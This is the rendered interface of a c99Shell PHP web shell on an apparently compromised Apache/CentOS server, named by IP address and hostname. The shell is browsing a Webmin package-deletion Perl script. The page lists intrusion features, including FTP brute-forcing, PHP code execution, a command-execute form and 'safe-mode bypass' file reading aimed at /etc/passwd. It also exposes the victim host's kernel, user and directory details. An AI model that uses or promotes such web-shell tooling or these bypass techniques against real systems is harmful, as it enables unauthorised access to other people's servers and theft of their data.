110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/software/ drwxr-xr-x Free 50.94 GB of 127.8 GB (39.86%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/software/ drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# delete_packs.cgi
# Ask if the user wants to delete multiple packages, and if so do it
# XXX logging

require './software-lib.pl';
&ReadParse();
&error_setup($text{'deletes_err'});
foreach $d (split(/\0/, $in{'del'})) {
    local ($p, $v) = split(/\s/, $d);
    local @pinfo;
    (@pinfo = &package_info($p, $v)) ||
        &error(&text('delete_epack', $p));
    push(@packs, $p);
    push(@vers, $v);
    push(@infos, \@pinfo);
    }
@packs || &error($text{'deletes_enone'});

&ui_print_header(undef, $text{'deletes_title'}, "", "delete");

if ($in{'sure'}) {
    # do the deletion
    print "<p>\n";
    if (defined(&delete_packages)) {
        # Can just use one function
        print &text('deletes_desc', "<tt>".join(" ", @packs)."</tt>"),
              "<p>\n";
        $error = &delete_packages(\@packs, \%in, \@vers);
        if ($error) {
            print "<b>",&text('deletes_failed2', $error),"</b><p>\n";
            }
        else {
            print "$text{'deletes_success2'}<p>\n";
            }
        }
    else {
        # Need to use a loop
        for($i=0; $i<@packs; $i++) {
            $error = &delete_package($packs[$i], \%in, $vers[$i]);
            if ($error) {
                print "<b>",&text('deletes_failed1', "<tt>$packs[$i]</tt>", $error),"</b><br>\n";
                }
            else {
                print &text('deletes_success1', "<tt>$packs[$i]</tt>"),"<br>\n";
                }
            }
        }
    &webmin_log("deletes", "package", undef, { 'packs' => \@packs });
    }
else {
    # Ask if the user is sure..
    print "<center>\n";
    print &text('deletes_rusure', "<tt>".join(" ", @packs)."</tt>"),
          "<p>\n";
    print &ui_form_start("delete_packs.cgi", "post");
    foreach $d (split(/\0/, $in{'del'})) {
        print &ui_hidden("del", $d);
        }
    print &ui_hidden("sure", 1);
    print &ui_hidden("search", $in{'search'});
    print &ui_submit($text{'deletes_ok'}),"<p>\n";
    if (defined(&delete_options)) {
        &delete_options($packs[0]);
        }
    print &ui_form_end(),"</center>\n";

    }

&ui_print_footer("search.cgi?search=$in{'search'}", $text{'search_return'});

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: